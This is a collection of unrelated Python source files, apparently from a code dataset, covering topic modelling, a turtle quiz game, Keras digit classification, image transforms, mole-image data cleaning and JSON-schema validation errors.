stop_words.extend([\"mb\", \"et\", \"al\", \"use\", \"yml\", \"also\", \"md\", \"zip\", \"gcs\", \"com\", \"jsonl\", \"json\",\n                       \"http\", \"huggingtweet\", \"spm\", \"pth\", \"https\", \"sa\", \"cc\", \"py\", \"ab\", \"png\", \"jpg\", \"mp4\",\n                       \"dataset\", \"datum\", \"information\", \"neededmore\", \"model\", \"huggingface\", \"txt\", \"pkl\"])\n    punctuation = set(string.punctuation)\n\n    
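# Editorial summary of the pipeline below: strip e-mail-like tokens and emojis,\n    # tokenize, drop stopwords, lemmatize with spaCy, then drop stopwords again,\n    # since lemmatization can reintroduce them (e.g. \"using\" -> \"use\").\n    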
documents = [re.sub(\"\\S*@\\S*\\s?\", \"\", document) for document in documents]\n documents = [_remove_emojis(document) for document in documents]\n documents = list(_convert_to_words(documents))\n documents = [[word for word in document if word not in stop_words] for document in documents]\n documents = _lemmatize(documents, nlp)\n documents = [[word for word in document if word not in stop_words] for document in documents]\n\n return documents\n\n\ndef build_bigrams(documents: List[List[str]]) -> Tuple[List[List[str]], gensim.models.phrases.Phraser]:\n bigram = gensim.models.Phrases(documents, min_count=5, threshold=100)\n bigram_mod = gensim.models.phrases.Phraser(bigram)\n bigrams = [bigram_mod[document] for document in documents]\n\n return (bigrams, bigram_mod)\n\ndef build_trigrams(documents: List[List[str]], bigram: gensim.models.phrases.Phraser) -> List[List[str]]:\n trigram = gensim.models.Phrases(bigram[documents], threshold=100)\n trigram_mod = gensim.models.phrases.Phraser(trigram)\n trigrams = [trigram_mod[document] for document in documents]\n\n return trigrams\n\n\ndef create_model(documents: List[List[str]], num_topics: int) -> Tuple[\n List[List[str]], \n corpora.Dictionary, \n gensim.models.ldamodel.LdaModel\n ]:\n\n id2word = corpora.Dictionary(documents)\n corpus = [id2word.doc2bow(document) for document in documents]\n\n\n lda_model = gensim.models.ldamodel.LdaModel(\n corpus=corpus, id2word=id2word, num_topics=num_topics,\n chunksize=100, passes=100,\n per_word_topics=True\n )\n\n return (corpus, id2word, lda_model)\n\n\ndef _lemmatize(\n documents: List[List[str]],\n nlp: spacy.Language, \n allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV'],\n) -> List[List[str]]:\n resulting_docs = []\n\n for document in documents:\n new_doc = nlp(\" \".join(document))\n tokens = [token.lemma_ for token in new_doc if token.pos_ in allowed_postags]\n resulting_docs.append(tokens)\n \n return resulting_docs\n\ndef _convert_to_words(documents: str) -> Generator[str, None, None]:\n for document in documents:\n yield simple_preprocess(document, deacc=True, min_len=3)\n\n\ndef extract_dominant_topics(\n model: gensim.models.LdaModel, \n corpus: List[List[str]],\n documents: List[str],\n named_topics: Dict[int, str]\n ) -> pd.DataFrame:\n cols = [\"Dataset\", \"Dominant Topic\", \"Percentage(%)\"]\n values = []\n\n for index, topic_val in enumerate(model[corpus]):\n row = sorted(topic_val[0], key = lambda x: (x[1]), reverse=True)\n dominant_topic = named_topics.get(row[0][0])\n dominant_topic_percentage = (row[0][1] * 100) \n document = documents[index]\n\n values.append([document, dominant_topic, dominant_topic_percentage])\n \n return pd.DataFrame(values, columns=cols)\n\n\ndef clean_titles(title: str) -> str:\n new_title = title.strip()\n new_title = _remove_emojis(new_title)\n new_title = new_title.encode(\"ascii\", errors=\"ignore\")\n new_title = new_title.decode(\"ascii\")\n new_title = re.sub(r\"http\\S+\", \"\", new_title)\n\n if len(new_title) > 50:\n new_title = new_title[:20]\n\n return new_title\n\n\n\ndef create_cat_dataframe(topic_dataframe: pd.DataFrame, total: int) -> Tuple[List[str], List[int]]:\n topics = topic_dataframe[\"dominant_topic\"].to_list()\n counter = Counter(topics)\n cols = []\n quantities = []\n percentages = []\n\n for key, value in counter.items():\n cols.append(f\"Topic {key}\")\n\n curr_quantity = value\n curr_percentage = np.round((value / total), decimals=4) * 100\n\n quantities.append(value)\n percentages.append(curr_percentage)\n\n df = 
pd.DataFrame([quantities, percentages], columns=cols)\n\n return (df, cols, counter.values())\n\n\ndef generate_wordcloud(\n model: gensim.models.LdaModel,\n topic: int,\n named_topics: Dict[int, str],\n max_words: int\n) -> Tuple[str, WordCloud]:\n named_topic = named_topics.get(topic)\n words = model.show_topic(topic)\n text = {word: value for word, value in words}\n wordcloud = WordCloud(background_color=\"white\", width=600, height=400, max_words=max_words, colormap=\"plasma\")\n wordcloud.generate_from_frequencies(text)\n\n return (named_topic, wordcloud)\n\n\ndef create_tsne(model: gensim.models.LdaModel, corpus: List[List[int]]) -> Tuple[np.ndarray, np.ndarray]:\n topic_weights = []\n topics = model[corpus]\n\n for index, topic in enumerate(topics):\n weights = [weight for _, weight in topic[0]]\n topic_weights.append(weights)\n\n df_weights = pd.DataFrame(topic_weights).fillna(0).values\n df_weights = df_weights[np.amax(df_weights, axis=1) > 0.35]\n dominant_topics = np.argmax(df_weights, axis=1)\n\n return (df_weights, dominant_topics)\n\n\ndef _remove_emojis(document: str) -> str:\n emoj = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n u\"\\U00002500-\\U00002BEF\" # chinese char\n u\"\\U00002702-\\U000027B0\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n u\"\\U0001f926-\\U0001f937\"\n u\"\\U00010000-\\U0010ffff\"\n u\"\\u2640-\\u2642\" \n u\"\\u2600-\\u2B55\"\n u\"\\u200d\"\n u\"\\u23cf\"\n u\"\\u23e9\"\n u\"\\u231a\"\n u\"\\ufe0f\" # dingbats\n u\"\\u3030\"\n \"]+\", re.UNICODE)\n \n return re.sub(emoj, \"\", document)\n\n","repo_name":"Elang89/hf-evolution","sub_path":"notebooks/scripts/lda_utils.py","file_name":"lda_utils.py","file_ext":"py","file_size_in_byte":6417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"45417644148","text":"import pandas\nimport turtle\nscreen = turtle.Screen()\nscreen.title('U.S. 
States Game')\nimage = \"blank_states_img.gif\"\nscreen.addshape(image)\nturtle.shape(image)\nloop = True\ndata = pandas.read_csv('./50_states.csv')\nall_states = data.state.to_list()\n# print(all_states)\ncount = 0\ntotal = []\n\n# print(all_states)\nwhile len(total) < 50:\n    answer_state = screen.textinput(title=f' {len(total)}/50 Guess the State', prompt=\"What's another state's name?\")\n    # title-case the guess so multi-word states like \"new york\" match the CSV\n    answer = answer_state.title()\n\n    if answer in all_states:\n        print('Yes')\n        total.append(answer)\n        print(answer)\n        tur = turtle.Turtle()\n        tur.hideturtle()\n        tur.penup()\n        date_state = data[data.state == answer]\n        tur.goto(int(date_state.x), int(date_state.y))\n        tur.write(answer)\n    elif answer == 'Exit':\n        # save the states that have not been guessed yet\n        miss_state = [state for state in all_states if state not in total]\n        new_data = pandas.DataFrame(miss_state)\n        new_data.to_csv('state to learn.csv')\n        break\n\n\n\n# import pandas\n# weather = {\n#     'day': ['monday', 'tuesday', 'wednesday'],\n#     'temp': [30, 40, 34]\n# }\n#\n# data = pandas.DataFrame(weather)\n#\n# for (index, row) in data.iterrows():\n#     print(row.temp)","repo_name":"khaleel3020/us_states_game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27223025002","text":"from playwright.sync_api import Page\r\nfrom repository import loginObject\r\n\r\n\r\nclass LoginPage:\r\n    def __init__(self, page: Page):\r\n        self.organization_input = page.locator(loginObject.username)\r\n\r\n\r\nif __name__ == '__main__':\r\n    page: Page\r\n    loginPage = LoginPage(page)\r\n    loginPage.organization_input.fill()\r\n","repo_name":"xuzihaode/Playwright-Demo","sub_path":"pages/login_page.py","file_name":"login_page.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34394438413","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n@version: ??\n@author: pengshp\n@license: Apache Licence\n@contact: pengshp@gmail.com\n@site: https://pengshp.github.io\n@software: PyCharm Community Edition\n@file: pip3-upgrade-all.py\n@time: 2017/3/1 10:28 PM\n\"\"\"\nimport pip\nfrom subprocess import call\n\n\ndef upgrade_all():\n    print(\"Upgrading all outdated packages......\")\n    for dist in pip.get_installed_distributions():\n        call(\"pip install --upgrade \" + dist.project_name, shell=True)\n\n\nif __name__ == '__main__':\n    upgrade_all()\n    print(\"Upgrade finished!\")\n","repo_name":"pengshp/PythonHub","sub_path":"spider/pip3-upgrade-all.py","file_name":"pip3-upgrade-all.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"19025481181","text":"from skimage import data, io, filters\n\ndef getPixelColor(img, x, y):\n    '''\n    use threading;\n    check OutOfRange;\n    compute the color;\n    return the color;\n    '''\n    return (0,0,0) #(R,G,B)\n\n\nimage = data.chelsea()\nwidth, height, s = image.shape\n\nfor i in range(0, width):\n    for j in range(0, height):\n        image[i,j] = getPixelColor(image, i, j)\n\nio.imshow_collection((data.chelsea(),image))\nio.show()\n","repo_name":"timaonaliza/Python","sub_path":"ImageResize.py","file_name":"ImageResize.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14956248402","text":"# <20.2.29> by KH\n\n'''\n75 page\nCNN in Keras\n'''\n\nimport 
keras\nfrom keras.datasets import mnist # Modified National Institute of Standards and Technology\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom keras import backend as K\n\nbatch_size = 128\nepochs = 2\n\n# We know we have 10 classes\n# which are the digits from 0~9\nnum_classes = 10\n\n# the data, split between train and test sets\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n# input image dimensions\nimg_rows, img_cols = X_train[0].shape\n\n# Reshaping the data to use it in our network\nif K.image_data_format() == 'channels_first':\n X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\n X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\nelse:\n X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)\n X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n# Scaleing the data\nX_train = X_train / 255.0\nX_test = X_test/255.0\n\nplt.imshow(X_test[1][...,0], cmap='Greys')\nplt.axis('off')\nplt.show()\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size = (3,3),\n activation = 'relu',\n input_shape = input_shape))\nmodel.add(Conv2D(32, (3, 3), activation = 'relu'))\nmodel.add(MaxPooling2D(pool_size = (2,2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nloss = 'categorical_crossentropy'\noptimizer = 'adam'\n\nmodel.compile(\n loss=loss, optimizer=optimizer, metrics = ['accuracy'])\n\nmodel.fit(X_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose = 1,\n validation_data = (X_test, y_test))\nscore = model.evaluate(X_test, y_test, verbose=0)\n\nprint(f'Test loss: { score[0]} - Test accuracy: {score[1]}')\n","repo_name":"newoni/Neural-Network-Practice","sub_path":"python files/practice11.py","file_name":"practice11.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5195048010","text":"N, M = map(int, input().split())\n\nB = list(map(int, input().split()))\n\nflag = True\nfor i, b in enumerate(B):\n if b % 7 == 0:\n if i != M-1:\n flag = False\n\npre_b = B[0] + 1\nfor j in B[1:]:\n if pre_b != j:\n flag = False\n pre_b += 1\n\nnext_b = \" \".join([str(i+7) for i in B])\nfor j in range(N-1):\n B = list(map(int, next_b.split()))\n b = input()\n if next_b != b:\n flag = False\n next_b = \" \".join(str(i+7) for i in B)\n\nprint(\"Yes\" if flag else \"No\")\n\n\n\n\n","repo_name":"corawada/Atcoder","sub_path":"abc/abc225/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23175777429","text":"import heapq\nN = int(input())\na = list(map(int,input().split()))\nfa = a[:N:]\nba = list(map(lambda x: x*(-1), a[2*N::]))\nheapq.heapify(fa)\nheapq.heapify(ba)\nsumf = sum(fa)\nsumb = sum(ba)\nsuml = [sumf]\n\nk = -2\n\nfor i in range(N, 2*N):\n heapq.heappush(fa, a[i])\n sumf += a[i]\n sumf -= heapq.heappop(fa)\n suml.append(sumf)\n\nsuml[-1] += sumb\n\nfor j in range(2*N-1, N-1, -1):\n heapq.heappush(ba, 
-a[j])\n sumb -= a[j]\n sumb -= heapq.heappop(ba)\n suml[k] += sumb\n k -= 1\n \n\n\nprint(max(suml))\n\n\n \n","repo_name":"kyojinatsubori/RoadToRedCoder","sub_path":"Snishiki/Ant/初級/データ構造/D(priority queue).py","file_name":"D(priority queue).py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11255190382","text":"\"\"\"\nSubplots with bitwise operations between images\n\"\"\"\nfrom os.path import join\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nfrom __init__ import assetsdir, rgb2gray, threshold, inverted_threshold\nfrom skimage import exposure\nfrom skimage.filters import threshold_otsu, threshold_local, threshold_mean\n\nimg1 = rgb2gray(mpimg.imread(join(assetsdir, \"Mars_Perseverance_descent_1.png\")))\nimg_eq = exposure.equalize_hist(mpimg.imread(join(assetsdir, \"Mars_Perseverance_descent_1.png\")))\nimg_otsu = img1 > threshold_otsu(img1)\n\nprint(img1.shape, img_eq.shape, img_otsu.shape)\n\n_, axs = plt.subplots(2, 3, constrained_layout=True)\nplt.axis(\"off\")\n\nprint(axs)\n\naxs[0, 0].imshow(img1)\naxs[0, 0].set_title('image')\n\naxs[0, 1].imshow(img_eq)\naxs[0, 1].set_title(\"histogram equalize\")\n\naxs[0, 2].set_title(\"otsu\")\naxs[0, 2].imshow(img_otsu)\n\n#\n# bitwise ops\n#\naxs[1, 0].set_title(\"NOT otsu\")\naxs[1, 0].imshow(np.bitwise_not(img_otsu))\n\naxs[1, 1].set_title(\"NOT tresh mean\")\naxs[1, 1].imshow(np.bitwise_not(img1 > threshold_mean(img1)))\n\naxs[1, 2].set_title(\"otsu XOR thresh mean\")\naxs[1, 2].imshow(np.bitwise_xor(img_otsu, img1 > threshold_mean(img1)))\n\n\nplt.show()","repo_name":"Mec-iS/ndarray-imaging","sub_path":"src/perseverance/landing_jezero_west_bitwise.py","file_name":"landing_jezero_west_bitwise.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"32590212445","text":"\"\"\"Extended image transformations to `torchvision`.\"\"\"\nfrom __future__ import division\n\nimport random\nimport numpy as np\nimport cv2\nimport data.transforms.utils.functional_cv as vf\nfrom data.transforms.utils.functional_cv import get_interp_method\n\n\ndef imresize(src, w, h, interp=1):\n \"\"\"Resize image.\"\"\"\n oh, ow, _ = src.shape\n return vf.resize(src, (w, h), interpolation=get_interp_method(interp, (oh, ow, h, w)))\n\n\ndef resize_short_within(img, short, max_size, mult_base=1, interp=2):\n \"\"\"Resizes shorter edge to size but make sure it's capped at maximum size.\"\"\"\n h, w, _ = img.shape\n im_size_min, im_size_max = (h, w) if w > h else (w, h)\n scale = float(short) / float(im_size_min)\n if np.round(scale * im_size_max / mult_base) * mult_base > max_size:\n scale = float(np.floor(max_size / mult_base) * mult_base) / float(im_size_max)\n new_w, new_h = (int(np.round(w * scale / mult_base) * mult_base),\n int(np.round(h * scale / mult_base) * mult_base))\n return vf.resize(img, (new_h, new_w), get_interp_method(interp, (h, w, new_h, new_w)))\n\n\nnumeric_types = (float, int, np.generic)\n\n\ndef random_expand(src, max_ratio=4, fill=0, keep_ratio=True):\n \"\"\"Random expand original image with borders, this is identical to placing\n the original image on a larger canvas.\n\n Parameters\n ----------\n src : mxnet.nd.NDArray\n The original image with HWC format.\n max_ratio : int or float\n Maximum ratio of the output image on both direction(vertical and horizontal)\n fill : int or float or 
array-like\n        The value(s) for padded borders. If `fill` is numerical type, RGB channels\n        will be padded with single value. Otherwise `fill` must have same length\n        as image channels, which results in padding with per-channel values.\n    keep_ratio : bool\n        If `True`, will keep output image the same aspect ratio as input.\n\n    Returns\n    -------\n    mxnet.nd.NDArray\n        Augmented image.\n    tuple\n        Tuple of (offset_x, offset_y, new_width, new_height)\n\n    \"\"\"\n    if max_ratio <= 1:\n        return src, (0, 0, src.shape[1], src.shape[0])\n\n    h, w, c = src.shape\n    ratio_x = random.uniform(1, max_ratio)\n    if keep_ratio:\n        ratio_y = ratio_x\n    else:\n        ratio_y = random.uniform(1, max_ratio)\n\n    oh, ow = int(h * ratio_y), int(w * ratio_x)\n    off_y = random.randint(0, oh - h)\n    off_x = random.randint(0, ow - w)\n\n    # make canvas\n    if isinstance(fill, numeric_types):\n        dst = np.full(shape=(oh, ow, c), fill_value=fill, dtype=src.dtype)\n    else:\n        fill = np.array(fill, dtype=src.dtype)\n        if not c == fill.size:\n            raise ValueError(\"Channel and fill size mismatch, {} vs {}\".format(c, fill.size))\n        dst = np.tile(fill.reshape((1, c)), reps=(oh * ow, 1)).reshape((oh, ow, c))\n\n    dst[off_y:off_y + h, off_x:off_x + w, :] = src\n    return dst, (off_x, off_y, ow, oh)\n\n\ndef fixed_crop(src, x0, y0, w, h, size=None, interp=2):\n    \"\"\"Crop src at fixed location, and (optionally) resize it to size.\n\n    Parameters\n    ----------\n    src : NDArray\n        Input image\n    x0 : int\n        Left boundary of the cropping area\n    y0 : int\n        Top boundary of the cropping area\n    w : int\n        Width of the cropping area\n    h : int\n        Height of the cropping area\n    size : tuple of (w, h)\n        Optional, resize to new size after cropping\n    interp : int, optional, default=2\n        Interpolation method. See resize_short for details.\n\n    Returns\n    -------\n    NDArray\n        An `NDArray` containing the cropped image.\n    \"\"\"\n    out = src[y0:y0 + h, x0:x0 + w, :]\n    if size is not None and (w, h) != size:\n        sizes = (h, w, size[1], size[0])\n        out = cv2.resize(out, size, interpolation=get_interp_method(interp, sizes))\n    return out\n\n\ndef random_flip(src, px=0, py=0, copy=False):\n    \"\"\"Randomly flip image along horizontal and vertical with probabilities.\n\n    Parameters\n    ----------\n    src : mxnet.nd.NDArray\n        Input image with HWC format.\n    px : float\n        Horizontal flip probability [0, 1].\n    py : float\n        Vertical flip probability [0, 1].\n    copy : bool\n        If `True`, return a copy of input\n\n    Returns\n    -------\n    mxnet.nd.NDArray\n        Augmented image.\n    tuple\n        Tuple of (flip_x, flip_y), records of whether flips are applied.\n\n    \"\"\"\n    flip_y = np.random.choice([False, True], p=[1 - py, py])\n    flip_x = np.random.choice([False, True], p=[1 - px, px])\n    if flip_y:\n        src = np.flip(src, axis=0)\n    if flip_x:\n        src = np.flip(src, axis=1)\n    if copy:\n        src = src.copy()\n    return src, (flip_x, flip_y)\n\n\n# for center_net\ndef get_3rd_point(a, b):\n    direct = a - b\n    return b + np.array([-direct[1], direct[0]], dtype=np.float32)\n\n\ndef get_dir(src_point, rot_rad):\n    sn, cs = np.sin(rot_rad), np.cos(rot_rad)\n\n    src_result = [0, 0]\n    src_result[0] = src_point[0] * cs - src_point[1] * sn\n    src_result[1] = src_point[0] * sn + src_point[1] * cs\n\n    return src_result\n\n\ndef get_affine_transform(center, scale, rot, output_size, shift=np.array([0, 0]), inv=0):\n    if not isinstance(scale, np.ndarray) and not isinstance(scale, list):\n        scale = np.array([scale, scale], dtype=np.float32)\n\n    scale_tmp = scale\n    src_w = scale_tmp[0]\n    dst_w = output_size[0]\n    dst_h = output_size[1]\n\n    rot_rad = np.pi * rot / 180\n    
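# Three point pairs define the warp: the (shifted) box center, a point half\n    # the source width away along the rotated axis, and a perpendicular third\n    # point from get_3rd_point; cv2.getAffineTransform below solves the 2x3\n    # matrix mapping the src triangle onto the dst triangle.\n    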
src_dir = get_dir([0, src_w * -0.5], rot_rad)\n    dst_dir = np.array([0, dst_w * -0.5], np.float32)\n\n    src = np.zeros((3, 2), dtype=np.float32)\n    dst = np.zeros((3, 2), dtype=np.float32)\n    src[0, :] = center + scale_tmp * shift\n    src[1, :] = center + src_dir + scale_tmp * shift\n    dst[0, :] = [dst_w * 0.5, dst_h * 0.5]\n    dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5], np.float32) + dst_dir\n\n    src[2:, :] = get_3rd_point(src[0, :], src[1, :])\n    dst[2:, :] = get_3rd_point(dst[0, :], dst[1, :])\n\n    if inv:\n        trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))\n    else:\n        trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))\n\n    return trans\n\n\ndef affine_transform(pt, t):\n    new_pt = np.array([pt[0], pt[1], 1.], dtype=np.float32).T\n    new_pt = np.dot(t, new_pt)\n    return new_pt[:2]\n","repo_name":"ZHANG-SHI-CHANG/pytorch-cv","sub_path":"data/transforms/utils/image_cv.py","file_name":"image_cv.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"72848975242","text":"##\n## Please make sure your work space\nimport pandas\nimport os\nimport shutil\nimport PIL.Image as pil\nimport xml.etree.ElementTree as et\nimport numpy\nstrOutputPath = \"Output/\"\ntry:\n    os.makedirs(strOutputPath)\nexcept:\n    shutil.rmtree(strOutputPath)\n    os.makedirs(strOutputPath)\n################################################################################\n##\n## 1. Clean table\n##\n## Original data table\ndataTable = pandas.read_csv(\"Data/Table.csv\")\n##\n## Select rows where a doctor gave a result\n## All remaining rows have a result\nsetDoctor = set(['Jack Li', 'Eric Lin 林','Christine(王筱涵)'])\ndataTable = dataTable.iloc[[i in setDoctor for i in dataTable[\"doctor\"]]]\ndataTable[[\"user_id\", \"doctor\"]].groupby([\"doctor\"]).count()\n##\n## Encode result\nstrNotMoleTag = [\n    '這不是痣, 可能是角化斑(老人斑), None',\n    '這不是痣, 其他, None',\n    '這不是痣, 可能是血管瘤, None',\n    '這不是痣, 其他, scar',\n    '這不是痣, 可能是黑斑, None',\n    '這不是痣, 其他, ulcer with crust',\n    '這不是痣, 其他, skin tag',\n    '這不是痣, 其他, skin tag?',\n    '這不是痣, 可能是血管瘤, None',\n    '這不是痣, 可能是黑色素沈澱, None',\n    '這不是痣, 其他, 可能是皮膚纖維瘤 建議看皮膚科醫師',\n    '這不是痣, None, None',\n    '這不是痣, 其他, not skin',\n    '這不是痣, 其他, None']\ndataTable = dataTable.replace(['低風險, None, None'], 0)\ndataTable = dataTable.replace(['中低風險, None, None'],1)\ndataTable = dataTable.replace(['中高風險, None, None'],2)\ndataTable = dataTable.replace([\"高風險, None, None\"], 3)\ndataTable = dataTable.replace(['照片較模糊, None, None'], 4)\ndataTable = dataTable.replace(['無法判斷, None, None', '無法判斷,請務必找皮膚科專科醫師做進一步診治。, None, None'], 5)\ndataTable = dataTable.replace(strNotMoleTag, 6)\n##\n## Select result\ndataTable = dataTable.iloc[[i in set([0, 2, 3]) for i in dataTable[\"result\"]]]\n##\n## Relabel result\ndataTable[\"result\"] = dataTable[\"result\"].replace([2,3],1)\n##\n## Select data with useful question\ndataTable = dataTable.iloc[[i in set(['21~40歲', '21歲以下', '40~65歲', '65歲以上']) for i in dataTable.age]]\ndataTable = dataTable.iloc[[i in set(['no', 'yes']) for i in dataTable.mole_size]]\ndataTable = dataTable.iloc[[i in set(['1年以上', '不記得', '1個月~1年', '1個月內']) for i in dataTable.period]]\ndataTable = dataTable.iloc[[i in set(['無變化', '不記得', '有變化']) for i in dataTable.change_1month]]\ndataTable[[\"result\", \"user_id\", \"doctor\"]].groupby([\"doctor\", \"result\"]).count()\n##\n## Group image\nstrImage1Tag = ['user_id', 'datetime', 'image1', 'mole_size',\n               'period', 'change_1month', 'gender', 'age',\n               'result', 'doctor', 'time_result',\n               'revision_result', 
'revision_dr', 'revision_time']\nstrImage2Tag = ['user_id', 'datetime', 'image2', 'mole_size',\n               'period', 'change_1month', 'gender', 'age',\n               'result', 'doctor', 'time_result',\n               'revision_result', 'revision_dr', 'revision_time']\ndataImage1 = dataTable[strImage1Tag]\ndataImage2 = dataTable[strImage2Tag]\ndataImage1.columns = dataImage1.columns.str.replace('image1','image')\ndataImage2.columns = dataImage2.columns.str.replace('image2','image')\ndataTable = pandas.concat([dataImage1, dataImage2])\n##\n## Encode variable\ndataVariable = pandas.get_dummies(dataTable[['mole_size', 'period', 'change_1month', 'gender', 'age']])\ndataTable = pandas.concat([dataTable[['user_id', 'image', 'result']], dataVariable], axis=1)\ndataTable.shape\n##\n## Save data table\ndataTable.to_csv(strOutputPath + \"Table.csv\", index = False)\n################################################################################\n##\n## 2. Crop images based on table and location\nfor index, data in dataTable.iterrows():\n    ##\n    ## Crop image1\n    file = data[\"image\"]\n    image = pil.open(\"Data/Image/\" + file)\n    xml = et.parse(\"Data/Location/\" + str.split(file, \".\")[0] + \".xml\")\n    bndbox = xml.findall(\"object\")[0].findall(\"bndbox\")[0]\n    (xmin, ymin, xmax, ymax) = tuple([float(i.text) for i in bndbox])\n    center = ((xmin + xmax)/2, (ymin + ymax)/2)\n    coordinate= (center[0] - 50, center[1] - 50, center[0] + 50, center[1] + 50)\n    crop = image.crop(coordinate)\n    strImagePath = strOutputPath + \"Image/\" + str(data[\"result\"]) + \"/\"\n    os.makedirs(strImagePath, exist_ok=True)\n    with open(strImagePath + file, 'wb') as f:\n        crop.save(f)\n################################################################################\n","repo_name":"HarveyC9846/MoleCheck","sub_path":"Clean/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"38183252457","text":"from __future__ import unicode_literals\n\nimport json\nfrom collections import OrderedDict, deque\nfrom textwrap import indent\n\n\nclass ValidationWarning(Exception):\n\n    def __init__(self, message, location, *args, **kwargs):\n        super(ValidationWarning, self).__init__(*args, **kwargs)\n        self.message = message\n        self.location = location\n\n    def __repr__(self):\n        return \"ValidationWarning({}, {})\".format(repr(self.message), repr(self.location))\n\n    def __str__(self):\n        return \"{}\\nlocation: {}\".format(self.message, self.location)\n\n    def __eq__(self, other):\n        if not isinstance(other, ValidationWarning):\n            return False\n        return self.message == other.message and self.location == other.location\n\n    def __hash__(self):\n        return hash((self.message, self.location))\n\n\nclass ValidationError(Exception):\n\n    def __init__(self, message, location, causes, *args, **kwargs):\n        super(ValidationError, self).__init__(*args, **kwargs)\n        self.message = message\n        self.location = location\n        if causes is None:\n            self.causes = ()\n        else:\n            self.causes = tuple(causes)\n\n    def __repr__(self):\n        return \"ValidationError({}, {}, {})\".format(repr(self.message), repr(self.location), repr(self.causes))\n\n    def __str__(self):\n        if self.causes:\n            return \"{}\\npossible causes:\\n{}\".format(self.message, '\\n'.join([indent(str(cause), ' ' * 4) for cause in self.causes]))\n        else:\n            return \"{}\\nlocation: {}\".format(self.message, self.location)\n\n    def __eq__(self, other):\n        if not isinstance(other, ValidationError):\n            return False\n        return self.message == other.message 
and self.location == other.location and self.causes == other.causes\n\n def __hash__(self):\n return hash((self.message, self.location, self.causes))\n\n\ndef make_validation_error(jsonschema_error):\n return ValidationError(_jsonschema_error_message(jsonschema_error), _jsonschema_error_schema_path(jsonschema_error), _jsonschema_error_causes(jsonschema_error))\n\n\ndef _jsonschema_error_message(jsonschema_error):\n if jsonschema_error.validator == 'type':\n return _type_error_message(jsonschema_error)\n if jsonschema_error.validator == 'required':\n return _required_error_message(jsonschema_error)\n if jsonschema_error.validator == 'additionalProperties':\n return _additional_properties_error_message(jsonschema_error)\n if jsonschema_error.validator == 'minimum':\n return _minimum_error_message(jsonschema_error)\n if jsonschema_error.validator == 'maximum':\n return _maximum_error_message(jsonschema_error)\n if jsonschema_error.validator == 'minLength':\n return _min_length_error_message(jsonschema_error)\n if jsonschema_error.validator == 'maxLength':\n return _max_length_error_message(jsonschema_error)\n if jsonschema_error.validator == 'pattern':\n return _pattern_error_message(jsonschema_error)\n if jsonschema_error.validator == 'enum':\n return _enum_error_message(jsonschema_error)\n if jsonschema_error.validator == 'minItems':\n return _min_items_error_message(jsonschema_error)\n if jsonschema_error.validator == 'maxItems':\n return _max_items_error_message(jsonschema_error)\n if jsonschema_error.validator == 'uniqueItems':\n return _unique_items_error_message(jsonschema_error)\n if jsonschema_error.validator == 'anyOf':\n return _anyof_error_message(jsonschema_error)\n return _unknown_error_message(jsonschema_error)\n\n\ndef _type_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n found_type = _json_type_for_instance(jsonschema_error.instance)\n if isinstance(jsonschema_error.validator_value, list):\n expected_types = ', '.join(jsonschema_error.validator_value)\n if found_type == 'null':\n return \"property {} with null value should be one of the allowed types: [{}]\".format(property_name, expected_types)\n else:\n return \"property type {} for property {} is not one of the allowed types: [{}]\".format(found_type, property_name, expected_types)\n 